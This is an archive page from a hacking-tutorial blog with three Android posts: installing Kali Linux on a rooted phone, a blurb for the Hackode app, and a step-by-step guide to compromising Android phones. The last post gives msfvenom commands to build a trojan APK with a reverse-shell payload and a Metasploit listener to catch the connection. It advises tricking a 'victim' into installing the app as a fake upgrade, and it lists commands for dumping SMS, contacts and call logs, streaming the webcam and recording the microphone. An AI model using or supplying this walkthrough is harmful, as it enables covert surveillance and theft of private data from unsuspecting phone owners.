• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar
KaliTut

KaliTut

Kali Linux tutorial and Linux system tips

  • Home
  • Raspberry Pi
  • Privacy Policy
  • About us

Install Kali Linux on Android Phone

Last Updated on July 19, 2020 by Kalitut 1 Comment

Kali Linux is one the best love operating system of hackers, security researchers and pentesters. It offers advanced penetration testing tool and its ease of use means that it should be a part of every security professional’s toolbox.

Install Kali Linux on Android Phone

Penetration testing involves using a variety of tools and techniques to test the limits of security policies and procedures. Now a days more and more apps are available on Android operating system for smartphones and tablets so it becomes worthwhile to have Kali Linux on your smartphone as well.

Kali Linux on Android smartphones and tablets allows researchers and pentesters to perform ” security checks” on things like cracking wep Wi-Fi passwords, finding vulnerabilities/bugs or cracking security on websites.  This opens the door to doing this from a mobile device such as a phone or a tablet.
lets see first what you needHardware:
1- A Rooted Android phone
2- Wireless Card capable of packet injection
   i used those tow:
                    *ALFA AWUS036H http://amzn.to/1UDrZnr
                    *wiflycity 56G  http://amzn.to/2clCmxr
3- Micro USB to USB Adapter

4- A battery powered usb pass-through for devices that doesn’t support high powered usb devices
Software:
1- Linux Deploy ( free in the Google App Store )
2- Shell Terminal Emulator ( free in the Google App Store )
3- BusyBox ( free in the Google App Store )
4- SuperUser ( free in the Google App Store )
5- Android VNC viewer ( free in the Google App Store )
Keep the following thing ready for the installation :
1- Fully charged Android Phone
2- Good Internet Connection(For Download Kali Linux images)
3- At least 5GB  Free Space
Now we have everything we need Hardware & Software are ready? let’s get to work then

  1. Open BusyBox  It will ask you for root permission  Grant superuser root access Now run smart install.
  2. Now open Linux deploy  Grant it root permission .
  3. Select the install button and choose your distribution In this case we will choose Kali Linux.
  4. Configuring our setup options .n. First we will make sure the “GUI” option is selected  By default it is not Then we will set our resolution setting under GUI setting to our devices resolution. Mine is 1440 x 2560 . if you don’t know what your phone devices resolution just google it like ( LG G3 devices resolution )
  5. Next we will set our image size and choose our components to be installed I do not suggest installing Kali components unless you have extra space.
  6. Setting our disk image is easy “0” Will automatically do this for you If you do not install the Kali components it will use 4GB of space That is enough for all tools used for wireless hacking, Metasploit and Armitage.
  7. Select install Then run it, It may take some time depending on your internet speed After it finished you will see “End Install” at the end of the line After install completed select and run reconfigure until you see “end configure”.
  8. Press the start button on your new install and execute Open androidVNC and enter your username and your password by default it is “changeme” Now if you followed instructions correctly your Kali Linux is now ready.
  9. To install Kali Linux you will need to use ‘sudo’ to grant root permission Your tool will be in Kali Linux menu after installed.

Connecting Your Wireless Card

  • 1. You will need to connect your Micro USB to USB adapter, battery-powered usb pass-through and card to your device.
  • 2. Use the Shell Terminal Emulator to disable your device’s factory card and enable your USB card. Some devices will require you to install the drivers manually.
  • any device with Android 4.1 or higher will have the driver installed for the ALFA AWUS036H.

This process it may differ from device to device It should not be hard to do even for the novice user

Android User: To view your wireless interface in Android use cmd: netcfg
You can start or stop with cmd: ifconfig start/stop (interface)
You will also need to mount your USB port to your Kali partition to use your card directly.
You can also use the pass through cmd but you will have to enable and disable monitor mode in android.

Check this android app
Hackode Android penetration tester
&&
Intercepter-NG [Android Edition] v2.0

Filed Under: Android pentesting tools

Hackode Android penetration tester

Last Updated on May 20, 2021 by Walid Salame 1 Comment

hackode

With the right tools and basic knowledge, anyone can become a hacker on their Android smartphone. With these tools, you don’t have to wear a hoodie or sit in a dark corner, pressing keys like crazy, you can hack wherever you are, waiting for the subway or standing in line at the supermarket.

And this is exactly what Hackode, which contains the perfect set of hacking tools from your Android phone with several utilities designed for cybersecurity experts and network administrators but adapted for ordinary users like you and me.

Ethical hackers and cybersecurity professionals. Hackode contains various modules including Reconnaissance, Scanning, Exploits and Security Feed
This Application contains different tools like:

[Read more…] about Hackode Android penetration tester

Filed Under: Android pentesting tools Tagged With: hackode

Exploit Android Using Kali Linux

Last Updated on May 20, 2021 by Walid Salame 31 Comments

This is a tutorial explaining how to hack android phones with Kali Linux

Exploit Android Using Kali Linux

Step 1: Fire-Up Kali:
Open a terminal, and make a Trojan .apk You can do this by typing :

msfvenom -p android/meterpreter/reverse_tcp
LHOST=192.168.0.112
LPORT=6227 R > andi.apk

LHOST=192.168.0.112 ( Change the IP with your own IP address ) To find your own IP type  in terminal

ifconfig

LPORT=6227 ( you can chose any port you want but make sure it’s not used )
You can also hack android on WAN i.e. through Internet by using your Public/External IP in the LHOST and by port forwarding

msfvenom -p android

Step 2: Open Another Terminal:
Open another terminal while the apk file is being produced.
start metasploit console, by typing :

msfconsole
msfconsole

Step 3: Set-Up a Listener:

exploit-multi-handler

After it loads(it will take some time), load the multi-handler exploit by typing :

use exploit/multi/handler

Set up a (reverse) payload by typing :

set payload android/meterpreter/reverse_tcp

To set L host & L Port type :

set LHOST 192.168.0.4
set LPORT 6227

(Even if you are hacking on WAN type your private/internal IP here not the public/external)

set payload android

Step 4: Exploit!
to start the listener type:

exploit

Copy the application that you made (adri.apk) from the root folder to you android phone.
or send it to the victim using Uploading services like Dropbox or any sharing website you may like.
Let the Victim install the andri app(as he would think it is meant to upgrade some features on his phone)
However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
And when the victim install your app >>>

exploit android

Step 5: have fun !
Type help to get a list of the available commend :

help
android hacking commands

and lets say we typed webcam_stream
There comes the Meterpreter prompt:

android webcam_stream

here is a list of all the commands

[tab]
[content title=”File system”]
Command       Description
    ——-       ———–
    cat                 Read the contents of a file to the screen
    cd                  Change directory
    checksum      Retrieve the checksum of a file
    dir                  List files (alias for ls)
    download      Download a file or directory
    edit               Edit a file
    getlwd          Print local working directory
    getwd           Print working directory
    lcd              Change local working directory
    lpwd            Print local working directory
    ls                 List files
    mkdir          Make directory
    mv              Move source to destination
    pwd            Print working directory
    rm              Delete the specified file
    rmdir          Remove directory
    search        Search for files
    upload        Upload a file or directory
[/content]
[content title=”Networking”]
    Command       Description
    ——-       ———–
    ifconfig       Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route           View and modify the routing table
[/content]
[content title=”System”]
 Command       Description
    ——-       ———–
    execute        Execute a command
    getuid          Get the user that the server is running as
    localtime     Displays the target system’s local date and time
    ps                List running processes
    shell            Drop into a system command shell
    sysinfo        Gets information about the remote system, such as OS
[/content]
[content title=”Webcam”]
Command        Description
    ——-        ———–
    record_mic          Record audio from the default microphone for X seconds
    webcam_chat       Start a video chat
    webcam_list        List webcams
    webcam_snap     Take a snapshot from the specified webcam
    webcam_stream   Play a video stream from the specified webcam

[/content]
[content title=”Android”]
   Command           Description
    ——-           ———–
    activity_start         Start an Android activity from a Uri string
    check_root            Check if device is rooted
    dump_calllog        Get call log
    dump_contacts      Get contacts list
    dump_sms             Get sms messages
    geolocate                Get current lat-long using geolocation
    hide_app_icon        Hide the app icon from the launcher
    interval_collect      Manage interval collection capabilities
    send_sms               Sends SMS from target session
    set_audio_mode     Set Ringer Mode
    sqlite_query           Query a SQLite database from storage
    wlan_geolocate    Get current lat-long using WLAN information
[/content]
[/tab]

Filed Under: Android pentesting tools

  • « Go to Previous Page
  • Go to page 1
  • Go to page 2

Follow us

  • Facebook
  • Twitter
  • YouTube

Categories

  • Android pentesting tools
  • Arduino
  • Books
  • Darknet
  • database
  • General
  • Github Tools
  • Hacking
  • Kali Linux
  • Linux
  • Linux Commands
  • Network Administrator
  • Penetration Testing
  • Penetration Testing Tools
  • PowerShell
  • Raspberry Pi
  • resources
  • Review
  • Termux
  • Tutorials
  • Ubuntu
  • Uncategorized
  • Video Tutorials
  • vmware
  • WiFi Adapter
  • WiFi Pentesting
  • Wireless Router
  • Wireshark

Recent Posts

  • Hijacked Wi-Fi? Thorough explanation of hacking techniques
  • Windows PowerShell tutorial for beginners
  • Learn to Hack Steps from Beginner to Hacker
  • PowerShell Tutorial – GUIDE introduction with basics
  • Top Hacking Tools
  • Home
  • About us
  • Privacy Policy
  • Affiliate disclaimer

Copyright © 2023